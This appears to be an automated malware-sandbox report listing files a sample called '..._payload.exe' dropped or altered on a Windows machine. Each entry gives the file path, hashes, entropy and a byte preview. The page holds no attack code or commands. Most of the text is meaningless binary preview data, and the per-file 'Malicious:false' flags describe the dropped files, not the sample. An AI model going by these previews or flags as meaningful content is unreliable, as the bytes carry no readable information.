                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.975153682605919
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:FxdprdBv7VgWmWo9tqnCel+5j6CjmzzFEsJYee8ieLLV6AqA8M/PWc:FthBvCWm1naCTjZsEsOEiGqlKt
                                                                                                                          MD5:D2A27D93632DFEEA02BAF252E70A98C8
                                                                                                                          SHA1:07013E0F8535B33E91B4841AE1206A3CA9C1CB06
                                                                                                                          SHA-256:07E25CDF234AB6191A4BBD977A6050539D2075B20F9AA2F534A41511A0B137D0
                                                                                                                          SHA-512:5E74C13E0D56B96FCE29F0F03C63E847A21FB8CA10C428D083D51A41471357AD22FFD2BE6DCF4FC66E9C2215D07D6C30AB1716E4F317926394C3018D050B819A
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf.9.d.>.`6..a.G?..6.]....Y$...#..7,.v.1.lO.w..[.@.r...WH.Bj..m...:...`!}X.GW./. ....d.}..{.....J.]]..I.....lu..0.F.FW. %.'...D.q.?...r .b...41t.1......[..C...A..Q+....ZT.Q._,.....D\[..c.. 4*.9.$!z....._...z.b.....<...^.w......"i+._.D)..y..`.JmS.;L.U...:.8.c.X...!.....G.J....r[..>U.`LW...'=.'.....j........5&......^Oq.X...r........<.w)4.|ZS.P.%...g....Y.3].r7..1>)T(D8..M...t.....v{(0...}Awm...1s.|-...X..Li5..V$T......$.j.1...m..>...................6..)..=...R...@0.Rd...U..6(.....D.eXN.....l6Y..\......x6..v..m1.a.|_...V..#.+.........-R.$.P...eJ....W<@...Zh...uf.S6>.&..2e$..$..'T%..h..C.S.+..\[}.Z;..#.d...!...+..R1....t=..alq.....2.OH...1.-,........N.LB....;I.T.@NR.........c.{.Yh...1.H......<.@....m.\'.E.I.....$i..U.B.....6&?.cT..X.b..<..+L..6...)S...........b.....d:....H........h...yu.l... n.AZS..ec._.=Y.?..6.(...[.C...q?.^...s)....G.J.F[...hk..H.W.e.....)....6..c...........~..J.P.......X.gny..x...4.{`iH..T..>.*?.....z....

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat.LOG1

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.98155335769909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:iZvmULEhLFHsgO+CD5ic5/+tR8KMUTDW3SzLbKiUhkJ4cOXVJUpr:i7IhRHrOj5Z5/+osWiH4kucOFJm
                                                                                                                          MD5:D03A47698ACA39235F6F21340E352127
                                                                                                                          SHA1:4CF08C3C5E9F759FCE608CEC779EA70D3A87C3E8
                                                                                                                          SHA-256:A31A81DB1236A830B225F8BB4492BB9092E39EF68BF0AA9FF449CB3808362DBE
                                                                                                                          SHA-512:62E809F3B7A796B90FA58EBE28F0AADC1763BE615CC3757D0DFE5123AC4FAE7B5C61B12035B2D86B66BEFA550C0D566765B7E17F888911DB8A9E781204E874B3
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf.....N.<.f.+(.G..P&?8u....J.].......s[.<.u.@.L".............|n..&V...k...........#]X........D.0.,.`u..?*C.I\4U.?6..w7W..B........$N...}.......".4..=....Nl.v.0MG^...o.'...!..P.US.....#}...(.7.!Q."CO...^.....0......u...C..H)y...@(...tu.....o...r.s\..8.....}...H...S..g(9..,../2...v..C.....o54....(.sQ..C..1.T......A}...{{.....E.b`0....iw... .y..w...=...\T."....top.V...N..n.y...o....|Q..f"V.......H....@v.i....;W[$w+.z)c^.\....4b..6.Y..z....~<-gl#|...#p.E...._.Z.Lj...*k'. 9.2...5..H...6..R?Nm..p../....i|.*...!'.&.s!.%..jM...B.m.j.{..A.9o~s.O........g.Q..[.1...mm..7.p.N.O.....n.Dr.x-{w....~.Zh.(.(.V......o.b...V7..]9.G3,-.`nr...S.../....o.>.v..V.cB.G.I.aJb............^..6.<A.x...r...m.P...{uqgU.\.0X.Mk.....`T..7.3Cv...B. .d.E.j.M}.3..P...GC..b.W...e......\?.........e....[hK?!.PW."..J...S......]K..<R..........u.I.}.B.\@.@-.+........sL/.]..{Z:..pl/.Or$d.,.)P4.b...Y.?F.?...J..#.7....s.2..AHj..u..xr..h.........3..>..jO."2..rm.K...e.8...Y....

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat.LOG2

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.979345906686375
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:5MN5pX2KF3E63CKsM56d7z6W9V/iUtMZuT:5MXp93EEvc7zv9VGZa
                                                                                                                          MD5:841A33E51B680FC1F0AD4FE883114A20
                                                                                                                          SHA1:F7EDCC00AED5293970DB69D78F98412AEF13370C
                                                                                                                          SHA-256:3749FAB92D8165F3209B745C09796EECAA5AD3FD926FCB32644DF0314C7BCA56
                                                                                                                          SHA-512:0630A2064F6D70BDA4A222C451C2EEF5CE178FC46DED58E7CBFF2DD28C3ECAECA1A474D1C6990223E8F4EFBDDC7926C22658C99BAEC64B0CE0BF7462F2993701
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf./.gG.....q.$,!.>.].6.].K[.cLP.(...]m6......cN..4..=..@9......k..zY.6....-0..~........N.2O..i..'{..................J......N&.IcT.>.k.."PJ.*..&.........l...;..;..vE0.V ........*.....C..~..E......H..J...Nh.,..._...g..r6......x..T.-85.):3.......4dw&L>7G.1..&......).30j&...A@..qt].....>H.g...Z.../...].3Z.$3..F.p....z...=....i...+g....V.lY...~wc....^.cA]....9...CF,.....\...S.Q..g.B........!.3....g+R[.O5;C.F)..R..>.NI....\...x..K....K........|A.......I..Y.v.._.om&..Qe.T....:..u...........T+....8..|z...W..,t.A.h/..j.)R.R....y.s..ua..z.-P..............u..1..8.........s4..*......x@{\e......].\.Q...C.A..K1.the..m.;..b2.8?.pg^.....'p....C.(..jZ..|..f..R..X(\......5...U.qp...c_.....#....?.Lh..8|.JG..:...Y....;.....=.O.......).V..^......NN......N....s.>>Q.@...&?.p...r.444....R..NB..Y.....X.#".&W7..D.D8...lP......G..]...5...t....L.-e......dK......k1..G.......(..y.2....G. .$......SKSok.b@.u..6...........G>........... ..........u2

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2727
                                                                                                                          Entropy (8bit):7.9344799940074635
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:XIOHYOBKRMvJ3auOhqYpxf/USmY2MBvFpeVpEob75+9R+2/cz04VJbINHD:4x4eMZauOhlpxf/mMBvFpjS7E9l/czXa
                                                                                                                          MD5:7BE30D85BF0FCB8E77321FAE784228AB
                                                                                                                          SHA1:03D298451F90BDEF11749E66750C856215175406
                                                                                                                          SHA-256:E4AE5049B0D1164C73B087D7062189CD848C4E9E8EA0E0CB29035437600171AD
                                                                                                                          SHA-512:37AC18B928D123B1EB18F66082F2F9C6F1FCF3F2EF65DDEBD9C9B9880BCA1DB1733756A4998F9500006189B62E766BF94B73378490664050AA4D9F3246F1924A
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.K.<q.l VfS!Qt...f-1....R..#..u.Vz..N.:g..?X..N.z>..,.&.]qW......#R..(..p.N.oZlCI.:@.A..1....Jr...W..8.....H1.....sE.k..=ga.op;.%@...#._.".c8..^...vD*Y....{.C..[.......j..$ ..(.]...I.63..,.G..I.V.R...}.j..>E4.B...;#+I.QM7|B}.._\t.I4H.^.C.T......(...[/kbv.A.[e_.E...3D.5.....S.ym...#q..<4....w...R9....aM.].\.c......r..............w......c.(.....8C....U..e.....9@.'05...Ej$tR..^...C.d..A.<..O.m.'9.NO..B.-....E.sJ...=....n..k.V=......y...........b.Z..c#'!Rl...OA0.......W...>TQ.E\.v[..f......Gu...^O.w.5lw(.$..9..ua&......r.\CF!&..?. ...<%..\..i...*$...dy..rIK..E.."..2}.4z..V..k...-.>....6.K.Dei..ip.ax$.......R..0.......w.qnv...b\.?...{.w1w.......1.A.+...>xU..~..@f.."....X..^._}Z...6OQY/_6nD.....h.[...x.<@..)f'.. ..S.....<8u8A..\.y..AK...56.S..."F..e.+... ... .K..t.Q..Y....f..1.....R.5.0.l.E.6B..N...2..!..^$.ui...?......u...G>.....Q..P.X...Z.....{....B...'+.....A...S(.B......w.G..e....K7.<..8...2......b.{...v.H....K~k....a...n,L.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1961
                                                                                                                          Entropy (8bit):7.9071564489292685
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Lvaz3jYlk52nf8gGJJzKzFZ9qVIoS8YD9eJYVgI0omPqzg1W8u9VFvyDqEH4x0Dr:LvawbnUrQIuoFkYuH8VGFR5cY7GTsv2D
                                                                                                                          MD5:AC0A74E9671E52B53F4FCE35F0125BEF
                                                                                                                          SHA1:4D21703C292849164C22841F5B95BE646E540ABB
                                                                                                                          SHA-256:925AC9BDE2F59C5149892DB60B15F6609B3375BCFD117F433A2F346519A22145
                                                                                                                          SHA-512:FACA6B4EC2293FF5734F9BDD4B487178F7BBEEECE5A3E3BE4F57ADF929C5F2F03CC97030596E97F13B2440339B63A49DF731B4EA8E0FA756DB50454EEA00B423
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..v.&.g.....3..t.7{....%3.a..s..[b..?.5<.e....^^.Ec............k.W.>.~.l..dWc.'.......'.<C.5...VC.L.a8..9AC..F...._.!9.U#.do..@.+...|.n..v.{.#w"..C6...._\B..{e7......3.P.C.*`.z.S..TR.j..K....@..s.....[.....E...7\+....<..o..V!...{.h.P.D@..1.).n+:i...R....1.('....A...Y..q..u.A...~.F.&...d..}|}........}.sm.<V..m.d...g a.d.j}.JS.% .SS..!$.....)......b.k...2..z,.42M:....L..|...,./+Cu....Cc.0..8..ZD84...`).R.....8.fK.<.._f...B.".R\F....zR.u...6.E.iXZ{p.....H.}.....>\..=r..x.Y./.+......~6.-.........h.p.........v...B....K ..XMq......j.W<..1<,.Y?v.n...;K.....D...6y>^l.~/.u.^v>D...q..r.c..!v<.'+...uI.Z..a..;:.p..........x|T.......@....K...W.......:.N..o\.......{2..p8*..NkyeK.P....U?..*......g..Fq"..M.N....U,..:c...kB..K.9]...F...u..Q...m_.)(..;...|g"t~F...n^.J.?.......M..`x...5....ZF...oz..o.{~....+..U.Cd.H...2"ao.p..N.pF..>.u...|..r...:.(`.o."v.?..ku..uf..E.8..........a...E.[..:Q....\+Q...&.W\0'..("......U$..*v.V.n.]....-.y..!.tl0-..y

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2735
                                                                                                                          Entropy (8bit):7.931936194380581
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:HhW41n3bpkF17wNNtUFsSYubeQzk/OguKP0kNCnnboa4i9tWoAXPOFSXBCKaD:HB1rWF1kN3tQIWgzM5nn9ux0Ky
                                                                                                                          MD5:3E949F45BA49C0D0B99193BFBFBA3A6B
                                                                                                                          SHA1:7012E756F7E0F88EED5A79853A7C8320100BC13E
                                                                                                                          SHA-256:E25F3D6AF526F64C209692660408315C77C865F68C5673FAE31DABB0B70ABDB9
                                                                                                                          SHA-512:5DD01A23D82D397E1A6CC6B9447FF041A43449F1702B3C5D59FF6C7C84FFE1ADB73F9402A4DD51DEB72FB7E16517D6B9F271100CA89D53243484EF6A20896980
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..@.\*..o:L.b'..59..(.B.C...y........}.H...(-r.c~.Kqa..x.....%.j.;.R......2Xw....J.}r.m4s...H.v.haVK.u.?..vER.......2w....T8.~.N.yC.[.n.+\.SG(j......C._`....%.O.y.o.""........m."..-y.......%.9......|..%{O5l.%..`.@.]c....l...{......c.h..Ty...h\.$..\.J..e.~n..GGO!..^.+..g.2..$&.n........Z."1s......+5$......v.N._I....Bz.]M.:b...z`r..K.p..-1=@6=..;.....l.;3G'x.D....f..%6..."{p......Ed<.:..9....EN...~YC.o...9 ..`...X..MR....p.z.x...i@u7..~. .....I....E..J.dm..[....jp...k...os+...Gu........>"x.b.W...t.$e.,z7.K....L....c..q..T.g.....OIU.y.>.Q.t2.4sg....zP=.8.bQPs.x........?...s....c.S.N.Mw{>U..}O.rV.l....5.....w....wb.c.$.W.8...u.9"..W.....LB>.z5...{.......17T.j.D.4y.....F....+..A.aL.....8..x)../1..."^..{...e.Y.wO..J....w.?....n...z..4<5#+.Sh....)%t..r..............R]..?...?*..6...].U..m....D.a..w...+..7.C..OY.....QD...._,.D.Z.U.U.^^.r..Z.....?.7...+.n....t......:.4>.`..*.q..E$.c.a..AS.%....Z.....6.....yA.h..[...9..*...s..y.V....W.....ed...?.a

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1911
                                                                                                                          Entropy (8bit):7.899224853116414
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:5351zgNUpXIxP/cKYxUwNAyaBr7xsvwawD:5351zgNzHchxUyaBr7Ovwv
                                                                                                                          MD5:46BE6630F75AC6E2D812169AE211A588
                                                                                                                          SHA1:7238BD123314FA9C2BF8C3D74989CACD896B0EF3
                                                                                                                          SHA-256:1865182751508330212221A798464FA240323F025C8F6455D4F6A7F3D55ED823
                                                                                                                          SHA-512:2D72ACEE064BA96C3DEBB04C60EFBB0989B5E7252B19567D7B8A03A1EF4A951F4D9E2F5CDAC0609154D5332E57AB48A4EF2345D9CDC5AACF9EA9BC5283A80D57
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.u.Q...X..].t...B...M3a.....W...#^.q`6l.Mg.R..K.."c.7x<5.R..98.>.q.T.;..Y.@.k....a...l.U..Q+..5..[.....J...XRR .`......V..#...q.r...*...<.U..&. 3.:Pi....q...2.... 7..y.G..z<.jH.<.KE.KZ8I.D-.5..._}:...0.....V.sif...R....T+...).:...K.......X./.h.*...uM.\fuxA..2..@.."......>.y..f4....a..+...|3.bB-...F+^...J.l.V.|.t]>....*e.....+v....X.Y.9y.....%. 8ir..e..{\.b.[./v.....cXb;.'...aYw.<.>..*.^.8I.s>.....C.m....]......v9b.r..R.H.V....0Tpg[.._....g.y..c. _WC4...5.x..g.,..9..g..Iz.u.P?...=3~...+.3....UNjR.\..S.8L.._d....a./.......g..}m...S...y.ik..+/...}.x-.. ..9........0 b.uf..U.U.,E.7.SO.........|.R..v.w...]FbR]L...K&.L.."...'.L.p.S.K....#`%.C.....<.Ca.>~P.y1...B..@.97A.............kJ...=.(y.z.O...l..a.~.[...WE....GI....]Q.nqd....M..^.2e.NEo..P.#.u..UE... .Y.`..68...c(.)..y.....k..y.".....pE6......:SI.:!..&c........._..n..&.V..H..$.n.i......`...Am..y%...xV...A..WX9..Ws>....vkM...%......l.vT.....#../$.%..A.U..........*../m..!&....-h...4..#Q~.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1887
                                                                                                                          Entropy (8bit):7.87349662793782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:mn5mqGzuOYQlb3a6RXM9zIY6wQm8tkcnGb6ZZ9t3e4WA0D:u5EZYQlbFu9zIBwQqcnGg13ZBg
                                                                                                                          MD5:7288F5BC2B2D4D5A440149855B1406D0
                                                                                                                          SHA1:E16414FC74999A263DE1F9AFB2E46988C98FA93A
                                                                                                                          SHA-256:0BCC5BC7B439CE91FA9185C61D827766004F4709671F7A1A76217AEC509AA087
                                                                                                                          SHA-512:55AF6B58D950D4E8859F91E57E676B41EADEB8F2861E276C07C0FDA91D8BD02555F3CFDF03D2A2A3F0ECCA7449B8261AAB991B1573F8967E0C26E3B3F6781642
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG......A....I..U...AYt..Vh.....Q/.w...s).!r.2.......[..!...YJ.c$.yY.},&...Y....{.eQv<.R\.......A.<.K....&.....B....L........l..._e.8....9/V.@,....d!. .,b..R..D;....P.}.v.9n...@hR..-..7.lF.W.....h.-..Nl.>..EI.!......U6..L.y..V[.?]\.yh....}..&2`...%]8...o.4.y~.x...ZC6...nx...FXZ..Y.O.........N...a.;.#.|h9]e..~......UW......c.c.b.......'7....U.o.hip..y../.k....ni.&vk4.4.G.....C....^..&."ds.........d.aB.#.Y...U..}/.`.....5H.......R.......mC%...e...#$..v...cT.......9m.q..\.._..c.1,p.]f.&.$........:....7-.......'.>o.....I.9...h..=.Cm.ACK.......OSmG....(.c...g.d....D...9..z..C,.F..........+....=".R....b..:.To.J...$.6i.z.F...#.=.......:...:..A..s.........?..Z..@.a..........7....b.... n~.../. .m}.....).jC...2........v.%LF.7.....T....K..........a#0FWR.-w#jf..@z.c..s.g<.d>.M)b.H...c&6.`j....a..c-:...7.D....W@.ebz.0..].%E$u..c...&.....a.C.:xq...s@...f.......l.../.c-...a.|.}.z.P7>6.3..2.x...lE..CU+J.P;..C..d.w.....Lk.._J.1.y..8XE....VB

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1447
                                                                                                                          Entropy (8bit):7.8767721557331445
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:JPyWTnbrzHLX5FPp+9YREgVfIYQW/xCqyspUJ8HZT4Xo4LLFO+EtF2zFaqmBd+V7:JPyWLDLX51p+9GESRF5C/kUJa4Ykw+E8
                                                                                                                          MD5:9A4DDE495A2D5DC743C6310864BAA03D
                                                                                                                          SHA1:F6AF1D40438A06CB3676415DF21E5C9D3F99AC14
                                                                                                                          SHA-256:5AD56019D3B66796E26C608C005BDB4D95DF5F894CE318A0074F97BD14906036
                                                                                                                          SHA-512:DCF61F3630CC4FA3D6016B363DF81EC26D43E05CC90CAA3FDEDE5B49A3A98489331160659D21880422EC5A82087A7DCEEA27383882F2847CC7E5DBA778AD4A6C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..rL.\....g.&By....`.R..aK..'......@)-77/..eO3...T\.R.....o<Z.6".......X.dC.K...K..,@...;.C..9.,.!~^`.Y.6.4?b....h.&....m..xQ.Q...It:...+Mp7\.:.. ."o.|.p..r3.R.Ed.q.M.......A]...z{..c.!....S.}.0...YM..........Tt.......i..x....l>.Q..uG...[.J...\..P9...b.v.3.6.=)y...?.l..?b3u. ...Q.7q.*......J..../*@.s..)kg:..Di.........v...,.y}....FB.M.....8?.*D$#{...(._br...*~.}>.]/.w.#...8..n.R._.i.......<sW....S.h..c.....Ac....%@...K....^.|}..q.0.....I.....M.p=...A...+(6...P..ob.+&4.F..._&#,;-c.(.....+.....l..e.)4(.\D...nj9.8.=...5..B.8.gX..Q..<..9=N..."....Zj.....O.i0C....*...,V.qXH.`.[.P....h...}..*..51..SW.{L...=...%?.....tt..P....Y.4L.!Y...r.0..1;k....`..;....P8.......D...`..k..n;U.'g..............O.M)....=Gk....}.....'.h.,.uH..u.:BR....u...0.U.5.o(S..i.+..+.&0.n@..k...K.*..v...=..B.U..O@S"Z........S.x."..t..i=%... z..))...(L7.z._.....V.n...`.......'..0[..........W.OE.!...c...!.V....FT...d.....I....T...+3p.90....N#.!.QD...C#vK..?.*.O..AW

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1783
                                                                                                                          Entropy (8bit):7.872554833013011
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ISSTPQ6DjHwcZmbu3Tx+V8upu9/gZ1jbNdxD:ITI6fHrgqVXupu+3fB
                                                                                                                          MD5:086DD5518EFA3643398FEB580851D7C6
                                                                                                                          SHA1:2AF6E7AE2808A12AC54CC411F0BA6E8A4CF7B3BD
                                                                                                                          SHA-256:EB21DDBA0CD3E54EE1B64B5B03D07A79934FF63C9E349B75C11DA3E30200D407
                                                                                                                          SHA-512:9572E1D13B9362C1DE6972062528AFB29E2E35905CA9D79936531CFF578D45E438D710FF7BBDBF15B4C2BC090941A5CC0DFECB76EB5A9EE2EF7442DE2D1D5492
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG...4....v...c[/.Z..}.....Z../.?Go.x....u..4`\...D.......P.e.^J.Y.s.9..z....6.3W......!..$.J.mW.... .d.....C..Yn.../..,bEUi.FK.<....j.....,..d:v..H.^.g..D......l.o..F...I..A-.ak.2.W.>a.C...v....[D~..`C.I.5.``...+.......4..0E{D!.v.#.J..kk......R...B.[....+...L:.......h....-..m...[.&.".V.S.+L.#3.X.5..S.Mu8.....K-.x..=[.._.........B......4....WJ.._Eb.l:QZ.VR-...e.....k{...6d.ft..B.).*....d.|2y5..j.L..C+..'..v.U..BCSa%..c...2Gc....N..#..I^.b......m.c..X.~..s[.`Nh.W.I^.R./1.r9..r!...2......]..z..Y.l......29d.9.....E9.. pHnxt.q9..b._*..#.....0pNn..).W..J..O.x....!..EDOT..Ht.~..0YS.........I..,....Iq..6... .=;...K.k...Z.h6.q.......p.G..d.....'|.&.l...d.A.3h.{..3..On..wv.)....q>~j..\..P...gU..C.nQOjK...^.ab...s.9.....>..`.O...6..o.p?..cT.....y...4z..3..a9.....'e.Y.......^.}.O.W..hH.x).........!..blW.X...f.C..b.T.t.%Y._._.!.|MG)..YQ ...[./...T$..........1.fm]C.pv...^...X.r..~d....*.._y....wO.+.......{K.....D8..%J..Lb.o*L.F't!vO...DB........

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1394
                                                                                                                          Entropy (8bit):7.83325963312175
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:uxZrOViQmJPOePQ6hKCM05shhfIl6IsFCJsndNRdr6eP206LIgqOwnbD:aEP+WeVhKr05srrFwcNRQeu0jgqO4D
                                                                                                                          MD5:52ECBB8C61B0F2837181968FFA2009C0
                                                                                                                          SHA1:30B36F34434EE5E1C86DB739877937ED49B12CA8
                                                                                                                          SHA-256:D8B68ED217325396CD320C4E5C103723B8D145AC0E292D973C1F2FCC96E124FA
                                                                                                                          SHA-512:52605BA0470969B27554616E0ED21450BB9EDE5D3DC920DC4C55BC7E98ECF4F3DDF8ECEC2C6E3F49829D576972E30F482EF3620669351DFF8C1211F9707198EF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..u.pb!r.l..`7....g@....G..(....7....[......S...f....n..(g...4....:.n.4P.{..ep*.!..4.........$.....*.k..TYL...M.._....q..:...6A.n....X..~_....9...O#).Y...i..s..PO$..?..a..{..)......Wfs..i..y.G......P<X...:O!k.....#.X....]...?[....<......E.e.s..Md<..^...t^....pE..M$.<.}8.#..1..U]>...-(.su.6..*.yD~A.1);:..5./..'..tC.z.<..H...k...8.C;n7...?u...T.=.....RU....n....rt.g.:..5f.k3.e33.R..e......G.ubMS..PB5..q/k.rM|p.=@....E....\='l......O....W.......(.$.\.....qi.]...Kycj.%.P.....4s.#.|..r.4[R....:.S..J......*....$.5.SS....]...B..M.Tb..x\...]~...47.u.K...........h............./..6<.izQ.9_..;.......mSoCN...Bs.l....z.q...ltHeO..q..~.U...\.p..`..~..._..cc...gP....._..L.).C..{2..g...l.W...y..^....U..n.o......u....fL.w.`.%......e. ..U.H.../M..q.V..PZ{.$.}......8.Wg....47.sv....F2.2......#B..>..E.^..#f..v.`...x.}.-..y.....}.A.R..(.mI*..7.....J..%%85<..3r...0.9.i.....s...)....f...~'....H.(.k....p.....S..g+:.F.W...l......ETK..*..e..j........P..(....

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1573198
                                                                                                                          Entropy (8bit):1.3858793221834422
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:OtSGFHMhTNTm8TDqvyGHppYtjBaOfWGBL:OtSGFyTN68CvyGJ+elW
                                                                                                                          MD5:52A39BE911B1966D98A03A7AC3A299AA
                                                                                                                          SHA1:38E6C7B0F73275A7D15C9A027FD1FC4DF22F1854
                                                                                                                          SHA-256:5E0ADEE497ED6F1E52AF92D48FE123515C3A1376B6558078216BB75A099FEF0E
                                                                                                                          SHA-512:578E36CBF88662C7E2542CAC953B8161618BD7B5E8313E8A25076262190FC6713D7992C9D4FA7DC85FF4E1CDD8E558C9ACFBBE22B89B866A5EA76B9BBB18312F
                                                                                                                          Malicious:false
                                                                                                                          Preview:o.....=.0..%..X..B}ic...xuYE....\.X..rG...S.sj.m....t...O.U.e..$....U...>.c|..Q.^DX...6...?#....|..A..Wl?...&f....r..,....7b.<.6.U...B.O~....N./......e_*.^.".C.}..!.............\.)...]m....8.b...L..G.....d......./...=..8.w.....C...e[..1.d.....7.*R.M.F.bj.U.@S.P9.0.Ma.\...Dq.o.H.[k..DY..^.....U..........h.S..f....E.:NB..O.;....: 2.'..Jw.r..I.1...P0%.y.0K..Ecj..G..z.....i.e...7X.-.U.E~..| n......kY....A..DR.{.....@.s...tDW.Nt.Q....j..Y.v.(.J.Ek..?S.).lI.?6.p...x^.GM...!..9f.(p..6.t ......:o!..'}D...)..N[..,.1:....u..19...=P.).H9.O...._.(...zQG..G.1!...1.C..G[.v=.....l.'...f=i.)..~.X.ZH{.$.p...P.....Y..~."..}.hdj...)......h...H........H..M9...]...FN..#..bn8'.p..d...)HS&..A.....[u.W]..N...-..u.x'.4#......}...-*F...r..+...'.eTH.._.`.,.....`s....{wX......%B...........s..b....~...S.?.I.M.@e.].c9....wU....'...eB4.vL...ZL....LX.1b........@..gp.bH8.O1...9M .ce`.....?.$.3u../.....p...+.4>\Fs|D._./_....-....`r.#D(.......^.G.v....(nq.....BT

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                          Download File
